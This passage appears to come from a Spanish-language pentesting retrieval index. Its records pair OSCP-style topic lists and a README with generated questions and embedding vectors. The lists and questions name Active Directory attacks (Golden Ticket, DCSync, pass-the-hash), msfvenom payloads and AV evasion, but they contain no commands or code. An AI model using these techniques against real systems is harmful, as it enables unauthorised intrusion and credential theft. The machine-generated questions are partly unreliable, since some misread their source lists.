-0.05608, 0.04045, -0.01929, -8e-05, -0.06953, 0.01816, 0.00884, -0.02573, 0.01866, -0.10026, -0.15806, -0.01422, -0.02718, -0.02965, -0.01265, -0.00194, 0.02771, -0.00992, -0.07492, -0.05724, 0.0073, -0.00817, 0.02145, -0.10967, -0.09753, -0.00494, -0.02603, 0.00209, -0.07597, 0.03258, -0.08986, 0.00561, -0.01761, -0.03337, 0.01869, -0.01439, 0.02567, -0.01127, 0.0246, -0.0387, 0.00183, -0.0822, -0.06691, 0.03277, 0.07087, 0.0367, -0.065, 0.07717, -0.00016, 0.00749, 0.11701, 0.03362, 0.04867, 0.02516, 0.01384, 0.01957, -0.02967, -0.00909, 0.01887, -0.07187, -0.07772, 0.02561, -0.03976, -0.01694, 0.0179, 0.01878, 0.06053, 0.0446, 0.00769, -0.03847, 0.03526, 0.02619, 0.0405, 0.02787, -0.01503, 0.03428, 0.02019, 0.04924, -0.0338, 0.01413, -0.01244, -0.07721, 0.0008, -0.00266, -0.03789, 0.05342, 0.03876, -0.00962, -0.02395, 0.00588, 0.02632, 0.01109, -0.06126, 0.03711, -0.07226, -0.03681, 0.00475, -0.02887, 0.01383, -0.0653, -0.06133, -0.0016, 0.04766, -0.0026, -0.002, 0.03576, 0.02814, -0.00692, -0.02446, -0.0123, 0.02374, 0.00017, -0.01284, -0.0246, -0.00728, 0.02193, -0.04399, 0.04575, 0.01741, -0.03311, -0.00283, -0.06417, 0.02921, 0.0511, 0.01563, -0.07564, -0.04207, -0.03669, -0.00856, -0.03043, -0.01913, 0.01102, -0.00061, 0.0289, -0.024, -0.01403, 0.0152]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🏰 Active Directory\n- Active Directory (Γ­ndice) Β· Kerberos Β· Kerberoasting Β· AS-REP Roasting\n- Mimikatz Β· Impacket Β· BloodHound\n- Pass-the-Hash Β· DCSync Β· Golden Ticket Β· Silver Ticket Β· secretsdump\n- Movimiento lateral Β· Pivoting ligolo-ng\n- GPP cpassword Β· LAPS Β· ACL abuses", "indexar": "cual es una tecnica efectiva para el movimiento lateral y pivoteo en una red corporativa?", "v": [-0.04158, -0.0783, -0.16949, -0.1322, 0.06045, -0.09906, 0.1074, 0.04689, -0.06894, -0.11614, -0.03205, 0.00699, 0.00114, 0.0568, 0.06236, 0.03564, 0.08332, -0.08586, -0.00498, -0.12667, -0.09508, -0.05851, -0.02431, 0.01099, 0.19824, 0.07024, 0.08087, 0.02384, -0.06095, 0.06061, 0.06546, 0.1906, 0.09976, -0.05548, 0.04368, 0.01406, 0.00771, -0.03574, 0.00155, 0.06071, -0.08478, -0.02879, -0.11047, 0.00268, 0.10633, 1e-05, -0.07703, 0.02332, -0.07905, 0.06148, 0.02375, 0.16752, -0.05609, -0.11753, -0.01226, -0.05826, 0.12591, -0.01461, -0.02685, -0.12686, 0.05699, 0.05951, 0.00341, 0.06873, -0.05384, -0.12449, 0.01701, -0.2082, -0.07825, -0.07861, -0.01179, 0.04472, -0.07615, 0.03656, 0.02601, 0.05235, -0.00674, 0.01487, 0.03692, 0.00795, 0.01839, 0.09621, -0.0602, 0.00441, -0.10161, -0.11394, 0.00173, -0.01375, 0.01976, -0.05041, 0.04179, -0.04419, -0.08155, 0.0263, -0.08975, 0.04715, -0.08707, 0.02538, -0.04441, -0.03712, 0.01996, 0.0277, -0.14256, -0.06877, 0.05587, -0.01522, -0.03675, -0.0643, 0.01444, 0.01652, 0.00125, 0.00787, -0.03429, 0.05011, 0.07248, -0.02207, -0.08542, -0.07859, -0.04848, 0.03733, 0.02732, -0.06102, -0.01736, -0.05172, -0.07769, -0.04854, -0.05718, 0.06662, 0.00056, 0.01385, -0.01921, -0.03461, -0.0681, -0.0345, -0.1245, 0.00229, 0.11992, 0.03199, 0.10815, -0.0498, 0.01356, 0.04072, -0.02882, -0.05634, 0.06316, 0.08395, 0.14473, -0.05436, -0.06142, 0.16955, -0.054, 0.0185, -0.03706, 0.02901, -0.03529, 0.03153, -0.03807, 0.01402, -0.04607, 0.09689, 0.02245, 0.03641, -0.04123, 0.01814, -0.01206, -0.0312, -0.08105, -0.00345, 0.07375, 0.02215, -0.00907, 0.01017, -0.0752, -0.02248, 0.00398, -0.02538, -0.09343, -0.02238, 0.03916, -0.0535, -0.04284, -0.00025, 0.03638, -0.02256, 0.03011, -0.01451, 0.02855, 0.00794, 0.06734, -0.01129, -0.01383, 0.01389, -0.05232, -0.05071, -0.0004, -0.07205, -0.0313, -0.04, 0.06003, -0.01085, -0.08025, -0.03999, -0.02685, 0.00432, 0.042, 0.04365, 0.00425, 0.06909, -0.01288, 0.01329, 0.01128, -0.01629, 0.06797, 0.00906, -0.1066, -0.04355, 0.00236, -0.02451, 0.00776, 0.05365, 0.08243, -0.04592, 0.06563, -0.03636, -0.03679, 0.01764, 0.03167, 0.02397, -0.06961, 0.0212, 0.04864, 0.0922, 0.01262, -0.01143, 0.04835, 0.05164, 0.09317, -0.0003, -0.04701, -0.04706, 0.04284, 0.00971, -0.08009, -0.00866, -0.00942, -0.04743, -0.09252, 0.03846, 0.00185, -0.05695, 0.008, 0.04527, 0.05113, -0.04984, 0.05984, -0.01413]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🏰 Active Directory\n- Active Directory (Γ­ndice) Β· Kerberos Β· Kerberoasting Β· AS-REP Roasting\n- Mimikatz Β· Impacket Β· BloodHound\n- Pass-the-Hash Β· DCSync Β· Golden Ticket Β· Silver Ticket Β· secretsdump\n- Movimiento lateral Β· Pivoting ligolo-ng\n- GPP cpassword Β· LAPS Β· ACL abuses", "indexar": "como montaria un ataque Golden Ticket o Silver Ticket para robar sesiones del dominio?", "v": [-0.09686, -0.20458, -0.03073, -0.16179, -0.21271, 0.01096, 0.00637, 0.033, 0.03917, 0.07437, -0.03037, -0.12379, 0.0987, -0.09405, 0.10784, -0.01565, 0.03886, 0.0395, 0.08808, -0.04872, 0.02921, 0.16221, 0.12677, -0.12664, 0.15563, -0.0403, 0.11819, 0.03586, 0.01662, 0.10101, 0.09819, -0.15445, 0.03678, -0.06577, -0.02229, -0.17459, 0.04304, 0.04533, 0.05486, -0.01781, 0.05677, -0.00347, -0.08729, 0.00176, 0.06831, -0.10544, -0.01138, 0.0491, -0.05042, -0.06914, 0.08739, 0.01615, -0.09201, -0.06118, -0.01219, -0.05218, -0.00157, -0.06195, 0.02674, 0.00913, -0.0582, -0.08667, -0.11488, 0.04565, -0.04609, 0.07415, 0.02353, 0.07436, 0.06733, 0.00098, -0.06125, 0.01043, -0.00131, 0.12578, 0.14165, -0.12269, 0.11812, 0.00199, 0.01145, 0.04023, 0.0201, 0.02, -0.0408, 0.07449, -0.05652, -0.02673, 0.10657, -0.1418, -0.07486, 0.04754, 0.00135, 0.00769, 0.00954, -0.11297, -0.07692, -0.12349, -0.07238, -0.06664, -0.09512, 0.01181, 0.03877, 0.03561, -0.04062, 0.04694, 0.00444, 0.08934, -0.01914, -0.06492, -0.00366, -0.09455, -0.16851, -0.03561, -0.11467, -0.03947, 0.01744, 0.01715, 0.03716, 0.06637, 0.04242, -0.02184, 0.04116, -0.05226, -0.04857, -0.04001, -0.01748, -0.01868, 0.01668, -0.03509, -0.03215, -0.11942, -0.0254, 0.05222, 0.05562, 0.03614, 0.00681, 0.06669, -0.0101, -0.10544, -0.05119, 0.03453, 0.01503, 0.04315, -0.03026, 0.03224, 0.0177, -0.05577, 0.02006, -0.04311, -0.02076, 0.00888, -0.02582, -0.05486, -0.05109, 0.08973, -0.02227, -0.00227, -0.05429, -0.04229, -0.0617, 0.06622, -0.0291, 0.0327, -0.05941, 0.02573, -0.03042, -0.0006, -0.00951, 0.04595, 0.01443, 0.03292, 0.05686, 0.01422, 0.04697, 0.01651, -0.01827, -0.03678, 0.0083, -0.03856, 0.09188, -0.04178, 0.0762, -0.02383, 0.01839, 0.07366, -0.06672, 0.05404, 0.08512, -0.01038, -0.00719, 0.00375, 0.0072, -0.00915, -0.02497, 0.0631, -0.00344, -0.11297, -0.03782, -0.01618, -0.00917, 0.01288, -0.01306, 5e-05, -0.05115, 0.02094, 0.09011, -0.02439, -0.02871, -0.03476, -0.02798, 0.04779, -0.01254, 0.01096, 0.09995, -0.09018, -0.01898, 0.00754, -0.02268, 0.01774, -0.04274, -0.01356, 0.02263, 0.04433, 0.03317, 0.01059, 0.01844, -0.02903, -0.04272, -0.04131, 0.04854, 0.05068, 0.04542, -0.02498, -0.02052, 0.04332, 0.03962, 0.00057, 0.05534, -0.01693, -0.04283, 0.04442, -0.06546, 0.03861, 0.00435, 0.04153, -0.01435, -0.00798, -0.04262, 0.06605, 0.0439, 0.0041, 0.05007, 0.0401, -0.02655, -0.02659, -0.02642, -0.01467]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ§ͺ Avanzado / Post-explotaciΓ³n\n- Buffer Overflow Β· Metasploit Β· msfvenom\n- Tunneling Β· Cracking de contraseΓ±as Β· Exploits conocidos\n- AV evasion Β· Client-side attacks", "indexar": "quΓ© programa puedo usar para generar payloads de buffer overflow?", "v": [0.08761, 0.0606, -0.17713, -0.0975, 0.00615, 0.03178, 0.05713, -0.05976, -0.13394, -0.08257, -0.19069, 0.027, -0.07007, 0.02897, -0.17884, 0.02128, -0.07103, -0.05818, -0.01986, 0.02392, 0.00545, 0.02096, -0.05818, -0.08958, -0.0505, 0.16393, -0.0224, -0.08492, -0.18355, -0.03542, 0.04659, 0.03544, 0.11624, -0.05788, -0.0553, 0.01797, 0.03116, 0.13042, -0.0116, 0.08569, 0.04839, 0.0924, -0.12784, 0.06914, 0.11464, 0.01693, 0.04627, 0.02105, 0.03308, -0.09723, 0.03828, 0.00398, -0.02462, 0.09405, -0.00083, -0.08176, 0.05065, -0.1956, -0.04612, 0.04571, -0.01355, 0.10996, 0.02921, -0.02394, -0.06905, -0.10631, 0.02848, 0.04484, -0.13431, 0.02779, -0.00524, -0.00141, 0.05566, 0.03649, 0.04411, 0.05662, -0.03798, -0.00984, 0.05945, 0.09582, -0.02611, 0.02516, 0.01697, 0.07772, -0.07521, -0.00483, 0.05469, -0.04913, 0.04318, -0.05072, -0.0028, 0.05387, 0.01005, 0.08778, 0.0501, -0.07174, 0.15071, 0.00826, 0.04228, 0.02927, 0.1014, -0.05017, 0.03518, 0.05244, 0.05105, 0.07636, 0.03861, -0.13202, -0.00991, -0.08272, 0.07752, -0.06105, 0.03673, -0.00218, -0.08003, -0.01015, -0.00598, 0.0296, 0.05914, -0.03495, -0.04338, 0.03057, 0.01936, -0.02546, 0.10966, -0.07368, -0.02384, 0.12387, -0.04236, 0.0707, -0.01723, 0.08429, -0.01278, -0.02042, -0.03162, -0.13689, 0.05142, -0.02076, -0.00868, -0.00958, 0.0464, 0.06166, 0.01589, 0.0569, 0.00167, -0.00223, -0.01369, -0.0888, -0.06761, -0.09274, 0.08184, 0.01069, -0.02497, 0.01022, -0.03961, -0.06699, 0.08931, -0.02054, -0.03836, -0.00379, -0.06341, 0.00817, -0.06513, 0.00107, 0.05708, -0.05811, -0.01475, -0.00091, -0.01761, 0.15464, 0.01623, 0.01337, 0.07701, -0.10432, 0.00217, -0.03986, -0.07373, -0.08821, 0.0181, -0.05158, -0.14456, 0.01691, 0.03392, 0.06667, -0.00648, -0.06748, -0.03467, 0.05274, 0.04116, 0.09613, 0.03867, 0.06875, 0.04989, -0.05857, -0.03189, -0.04292, -0.03034, 0.00604, 0.0496, -0.03978, 0.0423, -0.0075, -0.0218, -0.03089, 0.02334, 0.04501, -0.05948, -0.01441, 0.05579, 0.04465, 0.05698, -0.08652, 0.10205, -0.03099, -0.05298, 0.01743, -0.04721, 0.00894, 0.04902, 0.0261, 0.02452, 0.04168, 0.02196, 0.01601, 0.00206, 0.00526, 0.04063, -0.00743, 0.0502, 0.02388, -0.01536, 0.02408, -0.01191, -0.01535, 0.04764, -0.00905, -0.02781, -0.00159, -0.02795, -0.05847, 0.03554, 0.04398, -0.03259, -0.09273, -0.01798, -0.00483, -0.04518, 0.03939, -0.01082, -0.00955, -0.02453, 0.05843, -0.02269, -0.0134, 0.06527, 0.04459]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ§ͺ Avanzado / Post-explotaciΓ³n\n- Buffer Overflow Β· Metasploit Β· msfvenom\n- Tunneling Β· Cracking de contraseΓ±as Β· Exploits conocidos\n- AV evasion Β· Client-side attacks", "indexar": "con quΓ© herramienta puedo realizar ataques client-side contra antivirus?", "v": [-0.07823, 0.07753, -0.15834, -0.1681, -0.03424, -0.03687, 0.0065, 0.07274, -0.115, 0.0322, 0.04018, -0.14077, -0.02539, -0.02686, 0.1291, 0.02877, 0.10001, -0.10649, 0.12368, 0.08982, 0.00849, -0.08782, -0.02881, -0.02498, -0.07263, 0.05594, 0.03477, 0.0844, -0.10603, -0.02252, -0.05446, -0.01828, 0.02784, 0.04032, -0.06354, -0.01407, -0.09538, 0.10079, 0.09877, 0.06818, 0.08173, -0.0226, -0.15174, -0.02618, 0.06643, -0.02662, -0.00761, -0.07278, 0.07565, 0.05379, -0.03794, -0.12979, -0.1858, -0.06994, -0.01058, -0.12215, 0.07445, -0.14607, 0.11762, -0.10118, -0.1088, 0.14489, -0.04628, 0.03315, 0.07524, -0.08345, -0.01042, -0.05175, -0.0131, 0.07201, -0.0957, 0.03254, -0.00543, -0.03327, -0.02416, -0.032, -0.00407, 0.08211, 0.04325, -0.04788, -0.02497, 0.07742, -0.09149, -0.01526, -0.10321, -0.06798, -0.00119, -0.07666, -0.05863, -0.10869, 0.05637, 0.0467, -0.05596, -0.00168, -0.04729, -0.04058, 0.06492, -0.08775, -0.07442, -0.0744, 0.0403, -0.06114, -0.1216, 0.08431, 0.0213, -0.04627, -0.11826, -0.01944, -0.08483, -0.03983, -0.04411, -0.04105, 0.0138, -0.00306, 0.01682, -0.07777, -0.04376, -0.03899, 0.06751, -0.01159, -0.00346, 0.05297, -0.10811, 0.0624, 0.01441, -0.0006, -0.00252, 0.09678, -0.11194, -0.13924, 0.02032, -0.07529, -0.04236, 0.0213, -0.09029, 0.05886, 0.01106, -0.179, -0.01894, 0.00666, 0.01861, 0.06941, -0.0359, 0.02191, 0.02292, 0.00169, -0.02689, -0.07194, -0.06612, 0.01666, 0.09575, -0.03967, -0.00787, 0.04169, -0.08245, 0.01951, -0.04583, -0.02669, -0.03701, 0.07485, -0.02468, 0.01873, 0.02961, 0.04893, 0.01552, -0.05178, 0.0271, 0.02382, 0.04939, 0.06673, 0.02251, 0.05448, 0.05366, -0.10032, -0.03842, -0.02491, -0.01603, -0.02221, -0.00666, -0.10884, -0.00043, -0.05303, -0.0462, -0.00932, 0.0168, -0.04612, 0.04486, 0.04256, 0.05551, 0.01513, -0.05789, 0.03762, -0.03029, -0.02089, 0.05833, -0.04357, -0.03861, -0.08993, 0.01821, 0.02707, -0.01321, -0.06974, -0.06002, -0.04249, 0.04834, 0.10298, -0.01936, -0.00785, 0.01773, 0.03772, 0.07724, -0.01261, 0.05435, -0.01081, -0.05033, -0.04418, -0.00095, 0.01505, -0.00916, -0.01887, 0.04374, -0.00413, 0.00885, -0.01992, -0.0312, 0.01212, -0.03592, -0.04963, 0.03958, 0.00101, 0.00359, -0.07988, 0.00623, -0.05261, 0.00078, -0.03877, 0.03184, -0.05555, -0.03776, 0.0418, -0.03414, 0.01541, 0.0553, -0.07726, -0.05737, -0.0358, -0.03, -0.03018, -0.01566, -0.05409, -0.04761, 0.02233, 0.02278, 0.01528, 0.00967, 0.00542]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ§ͺ Avanzado / Post-explotaciΓ³n\n- Buffer Overflow Β· Metasploit Β· msfvenom\n- Tunneling Β· Cracking de contraseΓ±as Β· Exploits conocidos\n- AV evasion Β· Client-side attacks", "indexar": "cual es una alternativa libre a Metasploit para la post-explotaciΓ³n?", "v": [-0.01643, 0.01141, -0.06576, -0.04271, -0.06595, -0.01409, -0.01085, -0.02879, -0.23276, 0.00147, -0.05657, -0.13803, 0.04159, 0.10145, 0.09853, -0.09832, -0.00695, -0.1176, 0.05006, -0.13245, -0.18395, 0.00656, 0.00293, -0.10633, -0.07726, 0.04812, -0.03617, 0.0172, -0.06264, 0.02117, -0.03149, 0.03451, -0.10866, -0.02914, 0.08415, 0.08066, 0.12166, -0.06546, 0.13614, -0.04494, -0.00979, -0.10754, -0.06575, 0.07641, 0.04451, -0.13892, -0.07201, -0.06281, -0.12518, 0.0527, -0.07048, -0.03015, -0.05859, 0.0105, 0.08921, -0.07646, 0.10563, -0.03899, -0.16265, 0.09445, 0.03569, 0.01999, 0.01981, -0.08021, 0.01323, 0.00252, 0.01492, 0.07552, -0.05989, 0.14601, 0.07045, 0.04614, -0.06382, -0.01656, -0.04568, 0.09676, -0.08102, 0.04377, 0.01115, 0.00696, -0.02921, -0.04809, -0.01972, 0.05869, -0.02966, -0.06295, 0.05789, -0.10315, 0.02378, 0.02324, 0.08923, -0.01092, -0.03934, -0.01013, -0.0314, -0.14824, -0.02762, 0.10413, 0.04891, 0.1294, 0.06736, 0.0834, -0.04134, -0.00519, 0.0709, 0.04519, 0.00394, -0.04498, -0.10883, -0.02143, 0.04184, -0.0407, -0.00816, -0.00898, 0.03779, 0.01248, -0.12268, 0.00138, -0.01635, -0.0018, -0.0333, -0.02803, 0.00836, -0.04414, 0.06373, -0.01079, -0.00252, 0.02997, 0.00238, -0.02423, 0.01813, -0.00556, -0.06728, -0.0336, -0.03422, -0.11244, 0.14291, -0.04295, -0.05522, -0.02074, 0.01079, 0.04422, 0.02136, -0.03722, 0.02991, -0.03043, -0.03223, -0.10348, 0.06199, -0.08244, 0.03233, -0.09659, 0.00613, 0.06455, -0.0435, -0.02199, -0.07177, 0.04329, -0.00339, 0.12926, 0.06875, -0.13356, -0.06727, 0.0361, -0.04974, 0.04261, 0.04642, -0.09442, -0.14522, 0.01057, -0.0037, 0.04716, 0.12871, 0.01427, 0.04911, -0.09177, -0.00775, -0.01371, 0.09265, -0.03064, -0.00098, 0.03162, -0.03278, -0.00039, -0.01259, -0.02698, 0.03058, -0.03099, -0.01302, -0.01029, 0.05363, 0.00972, -0.00981, -0.02015, -0.01605, -0.00023, -0.0099, -0.05017, -0.00766, -0.00463, 0.00577, -0.0365, -0.02382, -0.03507, 0.02747, -0.02491, -0.07016, 0.06447, -0.04655, 0.05727, 0.06066, -0.05751, 0.10862, -0.05074, -0.11309, -0.01136, 0.07668, -0.01213, 0.00202, 0.00083, -0.00862, 0.072, 0.02794, -0.00883, -0.03753, 0.02042, 0.02889, 0.02232, 0.01749, 0.0161, -0.06198, 0.05177, -0.07912, 0.01153, -0.01983, 0.02053, 0.01867, 0.00059, -0.01092, -0.02547, 0.05436, 0.09252, -0.05288, 0.02486, -0.0408, -0.03517, -0.07627, 0.01111, 0.00392, -0.06963, -0.05414, 0.02111, 0.03725, -0.04404, 0.02492, -0.00844]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⌨️ Cheatsheets de shell\n- Operadores Bash Β· Operadores PowerShell\n- Port scanner PowerShell Β· Bucles bash sobre IPs", "indexar": "ΒΏquΓ© herramienta puedo usar para escanear puertos en Windows?", "v": [-0.05181, -0.03226, -0.11174, -0.11349, 0.02639, -0.11396, -0.00287, -0.20638, -0.04072, -0.11205, -0.13257, 0.0078, -0.03031, -0.05851, -0.10327, 0.00152, 0.02162, -0.03319, 0.04301, 0.0547, -0.04965, -0.04446, -0.11416, 0.00231, -0.07768, 0.06154, 0.0338, -0.00565, -0.19219, 0.00303, -0.06216, 0.09232, 0.07881, -0.03372, -0.05981, -0.11054, 0.00997, 0.02954, 0.16409, 0.09345, 0.07167, 0.10035, -0.0608, -0.03453, 0.10442, -0.01092, -0.0115, -0.03479, 0.02993, 0.06775, -0.06038, -0.09407, -0.09594, 0.03316, 0.02848, -0.11494, 0.19683, -0.01879, 0.01734, -0.08496, -0.06977, 0.10262, -0.05935, -0.00655, -0.07065, -0.08453, 0.00928, 0.01078, -0.06608, 0.12178, -0.09474, 0.02468, 0.08382, 0.05765, 0.01879, -0.01654, -0.02697, 0.01774, 0.0976, 0.05663, 0.07757, 0.03635, -0.04573, -0.08645, -0.01972, -0.12462, -0.0062, -0.03619, 0.07502, -0.18746, 0.00517, -0.04965, -0.04078, 0.08407, -0.0034, -0.06764, -0.00511, -0.02838, -0.03576, -0.0024, 0.09275, -0.07328, -0.04563, 0.07669, -0.04183, -1e-05, -0.02623, -0.11331, -0.06295, 0.00611, 0.07683, 0.06649, -0.04083, -0.00591, -0.07076, 0.07634, 0.02496, -0.15098, -0.01856, 0.01285, 0.03433, -0.00407, -0.10086, -0.03697, 0.0418, -0.04529, 0.0061, 0.13275, -0.07307, -0.02364, 0.03615, -0.06509, -0.09178, -0.06375, -0.11789, -0.02496, 0.0259, -0.14636, 0.03947, -0.04026, -0.00085, 0.06081, -0.06449, -0.03975, -0.0025, 0.05093, 0.03792, 0.02441, -0.05622, -0.07923, 0.10883, -0.05657, -0.07816, 0.00758, -0.06107, 0.02618, 0.09926, 0.09044, -0.07258, -0.00387, -0.05139, -0.03048, -0.0016, -0.0032, 0.03731, -0.0687, 0.01584, 0.03549, -0.00514, 0.00565, 0.06098, 0.11232, -0.01807, -0.05565, 0.05184, -0.02651, -0.01305, -0.00875, -0.08906, -0.04144, -0.05423, 0.0542, -0.0189, -0.07751, 0.02964, -0.01852, 0.00313, -0.03146, -0.06138, 0.08805, -0.07766, 0.01419, 0.06804, -0.08869, 0.00072, 0.03361, 0.00398, -0.03397, 0.03063, -0.0136, 0.01223, 0.01328, -0.00834, -0.06741, 0.1194, 0.05469, -0.08996, 0.00155, 0.06825, 0.0497, -0.0236, -0.00631, 0.01083, -0.02013, -0.01106, -0.03207, -0.02246, 0.05229, 0.00397, -0.0085, -0.03448, 0.0467, 0.01849, 0.03499, -0.0083, 0.02422, -0.04217, -0.00287, -0.02223, 0.00706, 0.06154, -0.00964, -0.03063, -0.02659, -0.00821, -0.04883, 0.006, -0.01434, -0.02971, -0.00136, -0.03813, 0.03018, 0.00566, -0.01887, -0.03548, -0.04476, 0.00637, 0.00123, -0.02764, -0.03969, -0.00412, 0.01503, 0.02451, -0.05118, -0.00713, 0.0441]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⌨️ Cheatsheets de shell\n- Operadores Bash Β· Operadores PowerShell\n- Port scanner PowerShell Β· Bucles bash sobre IPs", "indexar": "necesito un script rΓ‘pido para revisar puertos abiertos, ΒΏcon quΓ©?", "v": [0.04857, 0.05217, -0.19741, -0.05626, 0.09293, -0.17211, 0.0348, -0.12123, -0.10005, -0.15054, -0.05596, -0.05843, 0.05066, -0.04059, 0.02764, -0.07491, -0.00868, 0.10566, 0.12956, 0.01587, -0.05057, -0.17796, -0.09809, -0.09864, 0.04165, -0.0204, 0.01838, 0.0143, -0.12955, 0.01717, -0.07832, 0.03088, 0.15449, 0.08552, -0.07095, 0.01522, 0.19605, 0.04529, 0.11931, 0.12832, 0.12099, 0.13073, -0.08785, -0.00604, 0.086, -0.12967, 0.01256, -0.03909, -0.05679, 0.01063, 0.05404, -0.03014, -0.056, -0.04042, -0.10065, 0.05527, 0.01978, 0.0047, -0.01573, -0.04015, -0.01049, -0.03836, 0.07748, -0.05404, -0.09409, -0.07643, -0.05665, 0.06238, -0.08466, 0.02656, -0.11968, -0.03735, -0.02944, 0.11207, -0.054, -0.09073, -0.02353, -0.04335, -0.01867, 0.11749, 0.04565, 0.06069, 0.03439, -0.03255, -0.00882, -0.05273, -0.16729, 0.02327, 0.02179, -0.04271, 0.06662, -0.07533, -0.00788, 0.06996, -0.0607, 0.01003, -0.06723, 0.02287, -0.04776, 0.11286, -0.03879, -0.04387, 0.01072, 0.03437, -0.06242, 0.01291, -0.0329, -0.03317, -0.01267, 0.05839, 0.10841, 0.02792, 0.01962, -0.05218, 0.01303, -0.02215, -0.04973, -0.12365, -0.03745, -0.0059, 0.02181, 0.00268, -0.03137, -0.02003, -0.01927, -0.03698, 0.07976, 0.01732, 0.03283, 0.08268, 0.03741, -0.09818, -0.10822, -0.12779, -0.04479, 0.00664, 0.00921, -0.08632, -0.05143, -0.01713, -0.07114, -0.01012, -0.03148, 0.06671, 0.04378, -0.067, 0.00194, 0.01131, -0.08792, -0.00743, 0.01005, 0.01238, -0.03177, -0.00626, -0.02342, -0.07526, 0.11101, -0.02056, -0.09572, -0.03743, -0.01979, -0.04377, -0.03775, -0.03441, 0.02641, -0.08609, 0.01053, 0.05967, 0.00237, 0.01347, 0.0289, 0.03096, -0.05218, -0.05462, 0.06431, -0.01008, 0.03001, -0.0284, -0.09733, -0.04506, 0.03172, 0.01718, -0.03819, -0.01655, -0.07627, -0.05442, 0.04017, -0.08498, -0.01583, 0.10247, 0.03773, -0.01954, -0.00096, -0.06689, 0.03047, 0.03147, 0.0297, 0.0046, -0.01904, -0.0088, 0.05473, -0.00826, 0.02264, -0.03432, 0.02133, -0.01729, -0.06252, 0.05072, -0.01638, -0.00103, -0.0243, 0.02581, 0.04819, 0.06433, 0.02148, 0.02439, -0.06803, 0.10414, 0.09048, 0.03078, -0.03208, 0.04111, -0.08184, 0.04133, 0.06407, 0.02799, 0.01098, 0.00295, -0.0015, 0.03321, 0.06589, 0.00644, -0.08351, 0.01448, 0.00456, -0.01825, -0.08756, 0.00059, 0.0247, 0.04735, 0.0154, -0.01141, -0.00062, -0.03717, 0.02041, 0.01913, -0.00878, -0.004, -0.06084, 0.00288, -0.08925, 0.02589, -0.04395, -0.02277, 0.02622, 0.01548]} -{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Conocimiento\n\nMetodologΓ­a de pentesting y Linux que **viene con el repo**, para que un clon\nreciΓ©n hecho ya sepa de estas cosas sin depender de los apuntes privados de\nnadie. `indexa.py` lo indexa junto a las man pages y el glosario.\n\nSon apuntes propios (estilo OSCP) organizados por fase β€”enumeraciΓ³n, explotaciΓ³n\nweb, shells, escalada de privilegios, Active Directory, cheatsheets, avanzadoβ€”\ncon los comandos que se usan de verdad. Usan marcadores como `TU_IP` en vez de\ndirecciones reales; estΓ‘n limpios de datos personales (sin hosts, credenciales,\nrutas ni referencias privadas).\n\n`06 - Cheatsheets/Comandos de herramientas.md` reΓΊne las invocaciones mΓ‘s usadas\nde las herramientas que no traen man page (ffuf, sqlmap, la suite impacket,\nnetexec, hydra, evil-winrm...). `09 - Manuales/` va un paso mΓ‘s allΓ‘: es la salida\nde `--help` de esas mismas herramientas, cosechada con `../manuales.py` de la\npropia herramienta instalada y limpia de rutas. Entre las dos cosas β€”la\ninvocaciΓ³n comΓΊn y la referencia completa de opcionesβ€” el modelo tiene el manual\nque la man page no da. Si instalas una herramienta mΓ‘s, corre `manuales.py` y\nmanda el `.md` nuevo: es un buen commit.", "indexar": "quΓ© herramientas de pentesting vienen ya preinstaladas en este repo?", "v": [-0.00367, -0.02762, -0.275, -0.07204, 0.18639, 0.01357, -0.00339, -0.09548, -0.12708, -0.10127, -0.12394, -0.02053, -0.0962, -0.10307, 0.16467, 0.18328, -0.10768, -0.06496, 0.18904, -0.08107, -0.19964, -0.06359, -0.09282, 0.06292, -0.06957, 0.15649, 0.10255, 0.00949, -0.15546, 0.03937, 0.02273, 0.00494, -0.04422, -0.06188, -0.12937, -0.11859, -0.00409, 0.07966, 0.01633, 0.1275, 0.00929, -0.06936, -0.12072, 0.06778, -0.03792, -0.10509, 0.0219, 0.04294, 0.01302, 0.04781, -0.09307, -0.07265, -0.04648, -0.05865, 0.07991, -0.09025, 0.16105, -0.09216, 0.06982, -0.06406, -0.13615, 0.10201, -0.06971, 0.05649, 0.11659, -0.00497, -0.0699, -0.07039, -0.07919, 0.05554, 0.01213, 0.07059, 0.10066, -0.00732, -0.05791, 0.04221, -0.01596, 0.02908, 0.00026, -0.02513, -0.01951, 0.0131, -0.02587, 0.0009, -0.00391, -0.15758, 0.01338, 0.0209, -0.02688, -0.10368, -0.03286, 0.00879, 0.01415, 0.0302, 0.06151, -0.02441, 0.0335, 0.0182, 0.09283, -0.01316, 0.0024, 0.04861, 0.05623, 0.03751, -0.01692, -0.00303, 0.0174, -0.00615, -0.06651, -0.04198, 0.02731, 0.10825, -0.00595, -0.0335, -0.00086, -0.02795, 0.01491, -0.0806, -0.01513, -0.04623, 0.01373, 0.03021, -0.01594, 0.06779, 0.01544, -0.06984, -0.01215, 0.04098, 0.02924, -0.00013, 0.07861, -0.11662, -0.03418, -0.02357, -0.05715, -0.00802, 0.0189, -0.07231, -0.07956, -0.0806, 0.00988, 0.08835, -0.02862, -0.07503, 0.03407, 0.00568, 0.02104, -0.00015, -0.00322, -0.01055, -0.00186, -0.00956, 0.04668, 0.06745, -0.02439, 0.0337, -0.00518, -0.03055, -0.00868, -0.00412, -0.01824, -0.06052, -0.00267, 